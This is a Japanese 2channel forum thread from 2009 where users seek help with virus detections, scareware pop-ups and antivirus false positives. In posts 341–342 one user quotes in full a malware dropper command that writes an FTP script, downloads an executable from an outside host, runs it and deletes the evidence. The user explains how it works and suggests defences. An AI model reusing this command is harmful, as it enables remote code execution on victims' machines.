てか、セキュリティダッシュボード上では検知されてないのですよね。
313:名無しさん@お腹いっぱい。
09/01/11 10:06:43
>>297
うちもそれでたよ
前に検索した時は検出されなかったんだけど
今は>>312と同じで隔離中です
隔離する前に、シマンテックのオンラインスキャンかけたら、検出はされなかったです
314:名無しさん@お腹いっぱい。
09/01/11 13:44:41
★質問用テンプレ★
【使用OS】 「WindowsXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! バージョン4.8-1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Spybot-Search&Destroy」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
・DoubleClick
・KGBkeylogger
・Microsoft.Windows.Explorer
・Microsoft.WindowsSecurityCenter.TaskManager
・Right Media
Spybot-Search&Destroyで何度削除しても検知されます。
315:名無しさん@お腹いっぱい。
09/01/11 14:58:32
>>297
わたしも8日にウイルスバスターで検知されました。
始めてウイルス検知されたもんで(バスター2年使用)
あせって感染ファイルを確かめずに削除してしまいました…
その後手動検索しましたが何も検知されません。
大丈夫なのでしょうか。
316:名無しさん@お腹いっぱい。
09/01/11 20:04:23
【使用OS】 「XP home sp2」
【Microsoft Update(MU)の状態】 「最近やってません」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2007を一年延長してます」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【ルータの有無】 「NTTのを使用」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
マイスペやってたら変な所をクリックしたらしく
stabilityinternetscan.comというサイトに飛ばされ、「ウイルス感染してるから
セキュリティソフトをダウンロードしろ」とメッセージが出たので「いいえ」を
クリックして接続切ったんですが、ノートンでチェックしても異常は出ず、ググッたら
URLリンク(www.precisesecurity.com)
URLリンク(www.precisesecurity.com)
「System security」というソフトをインストールさせるための騙しサイト
らしいとわかりました。
ユーザーの書き込みをみるとポップアップが出て来るようですが私のPCには
出て来ません。
これは感染せずに済んでいるんでしょうか?
余計なクリックせずに接続切ればよかったんでしょうが「いいえ」をクリックして
しまったので気になります。
ノートンのウイルスリストには入ってなくて感染してるかどうかがわからないんです。
317:名無しさん@お腹いっぱい。
09/01/11 20:40:38
>>316
exeをダウンロードして実行していなければ問題なし
318:名無しさん@お腹いっぱい。
09/01/11 21:24:42
>>317
ありがとうございます、安心しました。
319:名無しさん@お腹いっぱい。
09/01/12 22:10:53
最近インターネットにアクセスすると
蜘蛛のアニメーションが出てくるようになりました
画面上を動き回ります。
こいつの影響なのか接続も遅くなったようです
スキャンでは検出されません
何か良い解決策を教えてください
320:名無しさん@お腹いっぱい。
09/01/13 00:47:48
使用OS】 Windows XP
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウイルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 済
【スパイウェア対策ソフト】 ウイルスバスター2009
【スパイウェア対策ソフトの更新は定期的に行なっているか】 済
【ルータの有無】 有
外付けHDDをチェックしたところTROJ Generic.DITが検出されました
トロイの木馬の一種のようですがググってもよく分かりません
これがどのような悪さをするのかご存知の方、教えてください
321:名無しさん@お腹いっぱい。
09/01/13 01:21:31
マルチウゼー
322:名無しさん@お腹いっぱい。
09/01/13 02:37:58
>>320
マジレスするとJavaScript関係、キャッシュを消せば解決
323:名無しさん@お腹いっぱい。
09/01/13 03:17:18
>>320
ドライブの復元ポイントに忍び込んでるタイプ。復元ポイントを削除すれば消える
324:初心者
09/01/13 19:18:16
RemoteAdmin.Win32.RemotelyAnywhere.o
ってウイルスを検知したんですがどんな悪さをするか教えて欲しいです。
御願いします。
325:名無しさん@お腹いっぱい。
09/01/13 22:54:25
>>324
今出てる具体的な症状をできるだけ詳細に述べてくれ。ただ個人的にはRemoteAdmin、RemotelyAnywhereってので何となく想像できる
326:名無しさん@お腹いっぱい。
09/01/13 22:57:34
>>319
OS再インスコも覚悟。スキャンで検出できず自力での削除も不可能なら危険、データが無事なうちに早めにする。そのうちブルーの画面が出てPCが攻撃されてますって英語で出てくることもある。
327:名無しさん@お腹いっぱい。
09/01/13 23:40:16
>>326
やっぱ有名なウイルスなんでしょうか?
蜘蛛のアニメが画面上に出てくるって
超冷や汗ものですよ
リカバリってことですよね
ありがとうございました
328:名無しさん@お腹いっぱい。
09/01/14 01:25:47
>>327
名前忘れたけど厄介だってのは知ってる。デスクトップに置いてあるデータも被害なく外付けに退避させられるからいいものの・・
確かに超冷や汗ものの一つだな。関わりたくないものの一つだ
こいつはダウンロードものに感染してるんじゃなくて海外サイト経由でひっかかるタイプだった気がする。
未知の海外サイト見る時はaguse gatewayを使った方が無難。危険なところも安全に見れる
今後の参考にしてくれ。多分最近見たサイトのどれかのはずだ
329:名無しさん@お腹いっぱい。
09/01/14 01:31:28
【使用OS】 Windows XP pro
【Microsoft Update(MU)の状態】 sp3にしてない状態
【使用セキュリティソフトとバージョン】 カスペアンチウイルス2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
【スキャンの結果】検出なし
最近system32にb33r06hF.exe.a_aとかmqM471x7.exe.a_aというファイルがたびたび出現します。
mqM471x7の方ができた場合、IEが自動起動・自動closeが3分おきくらいに繰り返されます。
スパイウェアなような気もしますが、
ぐぐっても特に情報が見つからなかったため、とりあえずこちらに書かせていただきました。
もし何かご存知の方おりましたら、情報いただけませんか?
330:名無しさん@お腹いっぱい。
09/01/14 02:04:57
>>329
つURLリンク(www.google.co.jp)
つURLリンク(www.trendmicro.co.jp)
331:名無しさん@お腹いっぱい。
09/01/14 09:55:15
>>330
どうもありがとうございます。
ファイル名でなく、拡張子で検索すればよかったんですね・・・
332:名無しさん@お腹いっぱい。
09/01/14 20:08:26
>>297
私のPCでも検出されましたので、トレンドマイクロに連絡しました。
今日メールで、「誤検出であったため最新のパターンファイルで対応した」との回答があり、
検索したら出なくなりました。
333:名無しさん@お腹いっぱい。
09/01/14 22:08:13
>>332
320と同じやつだな。DITだから誤検出か未知のウィルスか迷っていたが・・
結局気分悪いんで消しちまった。結構な数の人が検出されてたらしい
334:通りすがり
09/01/14 23:26:11
私もこの〔TROJ_Generic.DIT〕が名無しさんと同じファイル
〔午後のこ~だ〕と〔CyberLink PowerDVD〕+〔ジャストシステム〕で検出されましたので
トレンドマイクロに問い合わせ、指示に従いそのファイルを添付して調べてもらったところ
下記のような回答が来ました。
*****************************
今回検出されたファイルにつきましては、弊社にて解析の結果、
正常なファイルであると確認できましたので、ウイルスバスターの
誤検出となります。
現在はパターンファイル[5.767.50]にて修正済ですので、アップデート
を行っていただき検出されないか、ご確認いただきますようお願い
いたします。
*****************************
と言うことでしたので、実行するとすべてOKでした。
ウイルスバスター2009の誤検出だっただけのようです。
335:名無しさん@お腹いっぱい。
09/01/15 00:59:31
すみません。
WORM-VB.Ciiというウイルスがウイルスバスターで検出されたんですが、
どんな悪さをするんでしょうか?
目立った不具合は特にないのですが、パソコン(今年で五年目)の動きが遅く感じます。
教えてください。よろしくお願いいたします。
336:名無しさん@お腹いっぱい。
09/01/15 10:47:32
ウイルスバスターの検出名じゃないと思うんだが。
337:初心者
09/01/15 11:19:36
>>325さん
具体的な被害はないねんけど、ウィルスセキュリティをかけたら感染してますって出たんです。
実害はないんですが一応感染してる物をアンインストールしてもう一回セキュリティをかけたら出てこなくなりました。
もう大丈夫なんかな?
338:名無しさん@お腹いっぱい。
09/01/15 11:24:20
>>335
URLリンク(www.trendmicro.co.jp)
最近流行りのUSBメモリなどを介して感染するウイルス。
339:名無しさん@お腹いっぱい。
09/01/15 12:34:39
Ⅱかよ…・
340:名無しさん@お腹いっぱい。
09/01/15 12:52:16
>>335これってキンタマとか山田とか苺キンタマみたいな悪質なもの?
341:名無しさん@お腹いっぱい。
09/01/15 14:02:11
既出だったらごめんよ。
たまーにググるとヒットする「FireFoxUpdater.exe」の情報。
winmgmt(Windows Management Instrumentation)のセキュリティーホールを突い
て外部から潜り込ませるらしい。
以下詳細
まず、外部からwinmgmtを使って以下のコマンドを実行する。
cmd /c echo open b.nvgao.cn>%WINDIR%\WindowsGard&& echo hai
>>%WINDIR%\WindowsGard&& echo 123
>>%WINDIR%\WindowsGard&& echo binary
>>%WINDIR%\WindowsGard&& echo get 8888888888888.exe %WINDIR%\FireFoxUpdater.exe
>>%WINDIR%\WindowsGard&& echo bye
>>%WINDIR%\WindowsGard&& echo del %WINDIR%\WinA.bat
>>%WINDIR%\WinA.bat&& echo ftp -s:%WINDIR%\WindowsGard>%WINDIR%\WinF.bat&& echo %WINDIR%\FireFoxUpdater.exe
>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WindowsGard
>>%WINDIR%\WinF.bat&& echo cmd /c %WINDIR%\WinA.bat
>>%WINDIR%\WinF.bat&& echo del %WINDIR%\WinF.bat
>>%WINDIR%\WinF.bat&& %WINDIR%\winF.bat
※ 実際は改行無しの一行
わかる人はわかると思うが、上記の一行で以下の3つのファイル%WINDIR%(通常はC:\WINNTだね。)が作成され、、、
WinA.bat
WindowsGard
WinF.bat
342:名無しさん@お腹いっぱい。
09/01/15 14:03:09
>>341続き
最後にWinF.batが実行される。
そしてこのWinF.batが(上記を見れば分かると思うがw)
ftp -s:C:\WINNT\WindowsGard
C:\WINNT\FireFoxUpdater.exe
del C:\WINNT\WindowsGard
cmd /c C:\WINNT\WinA.bat
del C:\WINNT\WinF.bat
ftp -sでコマンドファイルを指定している。そしてWindowsGardの中身が(上記を見れば分かると思うがw)
open b.nvgao.cn
hai
123
binary
get 8888888888888.exe C:\WINNT\FireFoxUpdater.exe
bye
分かる人は、b.nvgao.cnで暴るのも(ry
で、FireFoxUpdater.exeをゲット完了後に即実行し・・・・
後はもうやりたい放題にやられちゃうと思います。
防御方法
Windows Management InstrumentationとWindows Management Instrumentation Driver Extensionsのサービス
を無効にする。
ftpコマンド名を変更する(moeftp.exeとかww)
343:名無しさん@お腹いっぱい。
09/01/15 14:44:53
>>342
FireFoxUpdater.exeという名前のウィルスなのですか?
344:名無しさん@お腹いっぱい。
09/01/15 15:18:23
うわぁ・・・
345:名無しさん@お腹いっぱい。
09/01/16 00:49:31
マルウェア対策でフリーソフトのcomodo boなんとかっての使っているが常駐でウップデートした奴を勝手に削除する素晴らしい糞です。
346:名無しさん@お腹いっぱい。
09/01/19 12:15:08
347:名無しさん@お腹いっぱい。
09/01/20 18:09:02
質問させて頂きます。
今まで使用してきたESET SmartSecrityの期限が切れまして、
PCを購入した為1ライセンスで2台使用できるセキュリティソフトを探しております。
PCの用途は専らオンラインゲームか動画鑑賞のみです。
メインPCのCPUはCore2Duo E8600で、メモリは4Gです。
サブPCはAthlon 64 X2 3800+のメモリ1Gです。
今まではサブをメインとして使用しており、そちらにセキュリティソフトを入れていました。
なので現在はメインPCにESET SmartSecrityの体験版、サブPCに期限切れのESET SmartSecrityを入れています。
サブPCは毎日起動しないので、もし無料のavast等でも事足りるのであれば、
メインに有料のソフト、サブに無料ソフトでもかまいません。
オンラインゲームをやることが非常に多いので、アカウントハック等を防げたらいいのですが・・・
PCに関しての知識は疎いので、あまり深いところまではわかりません。
長文・乱文で申し訳ありませんが、どうかよろしくお願いいたします。
【使用OS】 WindowsXP Home SP3
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ESET SmartSecrity
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 ESET SmartSecrity
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 あり
348:名無しさん@お腹いっぱい。
09/01/20 18:34:00
>>347
3PC版なら結構いろんな所から出てると思うが
F-Secure、ノートン、OneCare 等々
349:名無しさん@お腹いっぱい。
09/01/20 23:24:46
>>347
セキュリティーに興味を持って調べてこの板に来たんだからもうちょっと頑張って
性能のいいフリーソフトを使ってみてはどうでしょう(あと若干スレチな気もします)
参考までに↓
【無料】 フリーセキュリティの組合せ 9
スレリンク(sec板)
ちなみにどんなに頑張っても感染するときは気付かずいつの間にかかかるので
あまり神経質になりすぎてもどうかとは思います。
肝心なのは自分にとって使いやすい、きちんと設定できてなるべく検出率が良い
ソフトを使うことだと思います。
あと個人的にESETはよろしくないかと・・・・
E8600ならガチガチにセキュリティー固めても起動時以外で重さを体感出来ることはないので
軽さで選ぶのはやめたほうがいいと思います。(FPS上級者で1ドット単位で狙える人なら別ですが)
350:名無しさん@お腹いっぱい。
09/01/21 03:15:27
URLリンク(www7a.biglobe.ne.jp)
↑のアドレスのサイトにとんだ瞬間にW32.Aliz.Wormというウィルスに
感染したとのメッセージが出てきて
コンピューターウイルスW32.Aliz.Wormのダウンロードが完了しました。
このウイルスはハードディスク内のメモリー内を常に移動するようプログラムされているのでウイルスを駆除することは非常に
困難です。又、非常に感染性が高いのでネットワークを通して次から次へと感染ファイルを増やします。尚、このウイルスには
最初のページでの貴方個人情報を載せてありますのでインターネット上に貴方の個人情報を広めます。
プロパイダから損害賠償など多額な請求が来る可能性があります。ダイアルQ2に接続しましたので回線を切断しても
IPが残るので半永久的に請求が行われます。
更に詳しい詳細は下の詳細ボタンを押してください。
という文の書かれたページに飛んだのですが
本当に感染してしまったのでしょうか?
確認する術を知らないので皆さんのご助力を得たいのですが・・・。
351:名無しさん@お腹いっぱい。
09/01/21 03:21:10
>>350
ちょっとはググれ
URLリンク(www.google.co.jp)
352:名無しさん@お腹いっぱい。
09/01/21 11:31:02
てかそんなアドレス直リンすんなよボケ!
そんなサイトどうせ詐欺サイトなんじゃねーの
353:名無しさん@お腹いっぱい。
09/01/21 13:21:17
(・◎・)免許の更新にいってくる
354:名無しさん@お腹いっぱい。
09/01/21 13:22:03
>>353
誤爆乙
355:名無しさん@お腹いっぱい。
09/01/21 15:23:17
>>350
それ、いたずらサイト。
感染しないの問題ない。放置でOK
356:名無しさん@お腹いっぱい。
09/01/21 16:23:49
今XPをクリーンインストールした直後なんですが、
STOP! SYSTEM MAY REQUIRE IMMEDIATE ATTENTION
Your operating system registry may have errors or be corupt.
以下略
といった内容でRestorefix.comへの誘導の書かれたウィンドウが表示されました。
メッセンジャースパムというものらしいですが
そこに書かれたアドレスにアクセスしなければ平気なんでしょうか?
ドライバ等のアップデートを済ませてこれからXPの更新するところで
アンチウィルスソフトもまだ入れてない状態なのであまりググるのも危険な感じがして不安なんですが・・・。
このままアップデート作業進めて大丈夫なんだろうか・・・。
357:名無しさん@お腹いっぱい。
09/01/21 16:42:18
>>356
メンセンジャースパムはXP標準のサービス機能を悪用して行なわれるスパム
デフォルトではMessengerサービスがONの状態になっているので
手動でOFFにすれば今後届くようなこともない。
URLリンク(www.atmarkit.co.jp)
ついでに言っとくが
リモートアシスタンスやゲストユーザーアカウントも確認して置くように
ONになってると色々まずい
あとサービスのいじり方に慣れたのなら、不要なサービスはOFFにしておくと
安全性は高まる。
358:名無しさん@お腹いっぱい。
09/01/22 07:54:41
【使用OS】 「WinXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスタ-2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なっている」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンしてウィルスを発見したわけではなく、 1/21の夜から今現在まで
ウィルスバスターがしきりに不正変更を拒否しましたとポップアップを表示するようになりました。
【種類】 APIEvent
【検出リソース/プロセスID】 ZwWriteVirtualMemory
【ファイル名】 (空白)
【該当ポリシー】 DLL(プログラムライブラリ)インジェクション
【実行した処理】 確認&拒否
URLリンク(oshiete1.goo.ne.jp)
教えてgooにもまったく同様の症状を訴えている人がいて
回答にある参考URL(トレンドマイクロの対策ページ)を元に原因を探しているのですが、
感染したことを示すファイル類は検索で見つかっていません。
ほぼ同時期に発症しているため気味が悪いのですが、どのように対処をすべきなのでしょうか。
359:名無しさん@お腹いっぱい。
09/01/22 16:45:55
んーネトゲやってる?
360:358
09/01/22 22:05:17
>>359
自分の場合は幾つかネットゲームを経験しており、今はハンゲームのAradや
ダレットのMHFをしています。
361:名無しさん@お腹いっぱい。
09/01/22 23:27:11
>>360
とりあえず同時期にあるということは同時期に何かが更新されたんだと思う。
誤検出の可能性があるけど、確証は無い。
362:名無しさん@お腹いっぱい。
09/01/22 23:37:14
まあ、簡単に言えばnProtectの関係かなぁ、と漠然と思ってるのですが。
自分ネトゲしてないのでよく判らんのです……
試験的に除外してみてもいいかも
363:名無しさん@お腹いっぱい。
09/01/22 23:41:37
まあ、あげとく
364:358
09/01/24 10:07:23
結局今回の動作の原因は分からず、再起動をしたら症状は治まりました。
最終的にウイルスバスターのセキュリティーレポートを確認すると
二日間で425件の不正変更の監視、その内ほぼ全てが確認と拒否でしたが
ZwWriteVirtualMemoryに二回の許可。
ZwCreateThreadに一回の許可がありました。
セーフモードでAdAwareとウイルスバスターを走らせましたが
原因となるプログラムも検出されませんでした。
365:名無しさん@お腹いっぱい。
09/01/24 15:15:27
ウイルスバスターを入れれるんですけどメールを送信してないのに勝手に
「送信メールを検索しました」ってでるんだがどういう状況ですか?
366:名無しさん@お腹いっぱい。
09/01/24 17:51:13
>>358
いずれにせよそれって活動を隠すための手続きだと思うんですよ
ネットゲームのSecurityプログラムなども一部でそういう動きするらしく、
少し前に騒ぎになったこともあったと思うんですけども……
ただ、気になるのはrootkit系ウイルスも良くそういう活動をしたと思うんだよなぁ
ま、このままだとちょっと手が出ないので、アダ被で解析を依頼されて見てはいかがでしょうか?
367:名無しさん@お腹いっぱい。
09/01/24 17:57:32
987 :名無しさん@お腹いっぱい。:2009/01/24(土) 15:14:00
ウイルスバスターを入れれるんですけどメールを送信してないのに勝手に
「送信メールを検索しました」ってでるんだがどういう状況ですか?
368:名無しさん@お腹いっぱい。
09/01/24 22:16:13
【使用OS】Windows XP
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】ウイルスバスター2006
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい
【スパイウェア対策ソフト】ウイルスバスター2006
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
TROJ_TDSS.AXLN
C:\DOCUME~1\●● ~1\LOCALS~1\Temp\TDSScf7d.tmp
制限付のアカウントでは動作できるのですが、
管理者でログインするとデスクトップが表示されたままになります。
クリックやキー操作を受け付けません。
対策法を教えて頂けないでしょうか。
宜しくお願いします。
369:名無しさん@お腹いっぱい。
09/01/25 00:19:16
>>368
セーフモードで同じ? タスクバーは表示されてる?
タスクバーが表示されてなかったら、Ctrl+Shift+Escでタスクマネージャを起動して
「ファイル」->「新しいタスクの実行」で「explorer.exe」を起動してみて。
管理者でログイン出来たら、AVG Anti-Rootkitでスキャンして。
AVG Anti-Rootkit
URLリンク(www.softpedia.com)
370:名無しさん@お腹いっぱい。
09/01/25 02:13:37
>>365
P2P使ってるから
371:368
09/01/25 09:31:10
>>369
おかげさまで解決しました。
ありがとうございました。
372:名無しさん@お腹いっぱい。
09/01/25 16:14:21
オートランのウィルスって他のPCに繋いだことがないUSBにも感染するんですか?
自分のパソコンからUSBにウィルスは移るんでしょうか?
373:名無しさん@お腹いっぱい。
09/01/26 04:21:04
>>372
書き込みが日本語になってないから聞きたいことが良くわからんが……
オートランの拡散経路だけ説明だけする。
オートラン系のウイルス本体は、まずパソコンに感染する。
原因はさまざま。一番多いのはサイトからの感染だと言われてる。
で、そのあウイルスは感染PCに繋がれたUSBメモリに分身をコピーしてUSBを感染させ
その感染したUSBを媒介に、他のPCにも自分のコピーを広けると言う寸法。
以前は一つのファイルをブロックできれば無力化できたんだけど、
感染方法を変えやがったらしいから注意な。
しかし妙に対応が早いし、このウイルスの動きは奇妙。
374:名無しさん@お腹いっぱい。
09/01/26 20:46:21
誰か、google-redirectに感染した場合の対処方法を教えてくれ。
検索しても英語サイトばかりでわかんね。
375: ◆N9P3SuvBPo
09/01/26 20:55:26
>374
>google-redirect
WindowsUpdateサイトやセキュリティベンダーのサイトに接続すると
googleに繋がるというものですね。
それなら『AVG Anti-Rootkit』が効果がありますよ。
お試しあれ
376:名無しさん@お腹いっぱい。
09/01/26 21:15:37
>>372
確かに373の言うとおり、質問が判りにくいなw
>オートランのウィルスって他のPCに繋いだことがないUSBにも感染するんですか?
感染しない。USBとは通常、接続の仕様なので、USBメモリとかUSB接続HDDと表現してほしいね。
ただ、過去に事例が沢山あるが、USBメモリ、HDD、フォトフレーム、MP3プレイヤ等、USB接続を
利用する機器が、工場出荷時から感染していた事例は多く有るので、最新のセキュリティーを使用
することは、もはや必須。
>自分のパソコンからUSBにウィルスは移るんでしょうか?
USBメモリやHDDなど、自分のPCがマルウエアに感染すれば簡単に移る。しかも友人や会社など、周
りに多大な被害をもたらす。(最近、NETから隔離されている警察関連で大問題になってる)
373氏に付け加えるなら、自身で実行してしまう事例。ファイル交換の物、友人からの物、自分で
DLしたもの、まれにメール添付の物、など、自らマルウエアを管理者権限で実行する場合が多い。
又、WinUpdateしていない。ブラウザ自身やフラッシュやブラウザのアドオン(最近ではQuickTimeとか)、
PDFリーダ、他のNET接続するソフト類のアップデートを怠れば、何もしなくても感染する。
最近のNET事情は、知識のある奴でも躊躇するほど悪化していると思うよ。
安全と思われているWebページだって、明日は判らない。